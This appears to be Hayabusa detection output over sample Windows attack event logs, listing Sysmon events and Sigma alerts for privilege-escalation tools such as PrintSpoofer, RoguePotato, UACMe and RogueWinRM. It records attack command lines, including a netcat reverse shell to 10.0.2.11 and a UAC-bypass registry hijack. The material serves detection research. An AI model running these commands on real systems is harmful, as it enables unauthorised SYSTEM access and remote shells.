2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
2020-05-07 22:13:01.683 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - T1088 - UACBypass - changepk UACME61 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Launcher.SystemSettings\shell\open\command\(Default): c:\Windows\System32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 7084 | PGUID: 747F3D96-095D-5EB4-0000-001082FF1700,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\ChangePk.exe"" | LID: 0x2ecba | PID: 5216 | PGUID: 747F3D96-095E-5EB4-0000-0010D46F1800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | Process: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.647 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\frAQBc8Wsa1 | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.662 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\frAQBc8Wsa1 | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,17,info,,Pipe Created,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.701 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,<Anonymous Pipe> | Process: c:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe | PID: 8028 | PGUID: 747F3D96-4640-5EB7-0000-0010292D4B01,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" | LID: 0x3e7 | PID: 372 | PGUID: 747F3D96-4640-5EB7-0000-0010EF364B01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:38.023 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49682 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 7672 | PGUID: 747F3D96-4647-5EB7-0000-0010B3454B01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 180 | PGUID: 747F3D96-46A4-5EB7-0000-00109FE74C01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-10 09:11:20.824 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.101:49683 (MSEDGEWIN10) | Dst: 192.168.56.1:139 (LAPTOP-JU4M3I0E) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-3B8B-5EB5-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | Process: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: c:\Users\IEUser\tools\PrivEsc\RoguePotato.exe | PID: 4200 | PGUID: 747F3D96-DE14-5EB9-0000-0010BE064300,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Rogue Epmapper np detected - possible RoguePotato privesc | Pipe: \RoguePotato\pipe\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-545A-5EBA-0000-0010EB030000,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | Process: C:\Users\IEUser\Tools\Misc\nc64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 | LID: 0x3e7 | PID: 4468 | PGUID: 747F3D96-DE14-5EB9-0000-00107C0F4300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe | LID: 0x3e7 | PID: 224 | PGUID: 747F3D96-DE14-5EB9-0000-001079154300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 5252 | PGUID: 747F3D96-DE32-5EB9-0000-00103FC14300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Akagi.exe 58 c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89eef | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.183 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - Rogue Windir - UAC bypass prep | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Environment\windir: C:\Users\IEUser\AppData\Local\Temp\DNeruK | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.184 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | Process: C:\Windows\explorer.exe | PID: 1036 | PGUID: 747F3D96-BB89-5EBA-0000-001057413600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 328 310 0000028A37652590 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6968 | PGUID: 747F3D96-BB89-5EBA-0000-0010FB4C3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | Process: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41} | LID: 0x89ebf | PID: 1088 | PGUID: 747F3D96-BB89-5EBA-0000-001042653600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 | LID: 0x89ebf | PID: 4688 | PGUID: 747F3D96-BB89-5EBA-0000-001019683600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | LID: 0x3e7 | PID: 8052 | PGUID: 747F3D96-3F20-5EBB-0000-0010035E3600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3080 | PGUID: 747F3D96-3F44-5EBB-0000-001017813700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6344 | PGUID: 747F3D96-3F44-5EBB-0000-0010EA933700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6372 | PGUID: 747F3D96-3F44-5EBB-0000-0010D29A3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e5 | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
